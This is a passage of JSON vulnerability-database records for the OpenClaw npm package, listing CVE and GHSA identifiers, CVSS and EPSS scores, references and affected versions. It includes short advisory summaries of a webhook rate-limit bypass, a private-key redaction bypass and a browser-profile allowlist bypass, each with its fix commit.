"}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jjw7-3vjf-fg5j","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jjw7-3vjf-fg5j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41385","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41385"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-nostr-private-key-exposure-via-config-get-redaction-bypass","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-nostr-private-key-exposure-via-config-get-redaction-bypass"},{"reference_url":"https://github.com/advisories/GHSA-jjw7-3vjf-fg5j","reference_id":"GHSA-jjw7-3vjf-fg5j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jjw7-3vjf-fg5j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41385","GHSA-jjw7-3vjf-fg5j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-da47-zdf1-mfgf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91608?format=json","vulnerability_id":"VCID-dbcw-brhj-k7hs","summary":"OpenClaw: Synology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Webhook Token\n## Summary\n\nSynology Chat Webhook Pre-Auth Rate-Limit Bypass Enables Brute-Force Guessing of Weak Webhook Token\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSynology Chat webhook auth previously rejected invalid tokens without throttling repeated guesses, allowing brute-force attempts against weak webhook secrets. Commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c` adds repeated-guess throttling before auth failure responses.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `0b4d07337467f4d40a0cc1ced83d45ceaec0863c`.\n\n## Fix Commit(s)\n\n- `0b4d07337467f4d40a0cc1ced83d45ceaec0863c`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35646","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23481","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23421","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23468","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35646"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/"}],"url":"https://github.com/openclaw/openclaw/commit/0b4d07337467f4d40a0cc1ced83d45ceaec0863c"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mf5g-6r6f-ghhm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35646","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35646"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation"},{"reference_url":"https://github.com/advisories/GHSA-mf5g-6r6f-ghhm","reference_id":"GHSA-mf5g-6r6f-ghhm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mf5g-6r6f-ghhm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35646","GHSA-mf5g-6r6f-ghhm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dbcw-brhj-k7hs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90343?format=json","vulnerability_id":"VCID-ddf9-tnrt-r7f2","summary":"OpenClaw: Node browser proxy `allowProfiles` bypass through persistent profile mutation and runtime profile selection\n## Summary\nNode browser proxy `allowProfiles` bypass through persistent profile mutation and runtime profile selection\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real released allowProfiles bypass through profile mutation and runtime profile selection, fixed and shipped in v2026.3.22+, so keep open for publish rather than close.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.13-1`\n- Patched versions: `>= 2026.3.22`\n- First stable tag containing the fix: `v2026.3.22`\n\n## Fix Commit(s)\n- `eac93507c36ccd0c359fba18fa466ef6448be8a5` — 2026-03-23T00:56:44-07:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.22`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/eac93507c36ccd0c359fba18fa466ef6448be8a5","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/eac93507c36ccd0c359fba18fa466ef6448be8a5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h5hg-h7rr-gpf3","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h5hg-h7rr-gpf3"},{"reference_url":"https://github.com/advisories/GHSA-h5hg-h7rr-gpf3","reference_id":"GHSA-h5hg-h7rr-gpf3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h5hg-h7rr-gpf3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-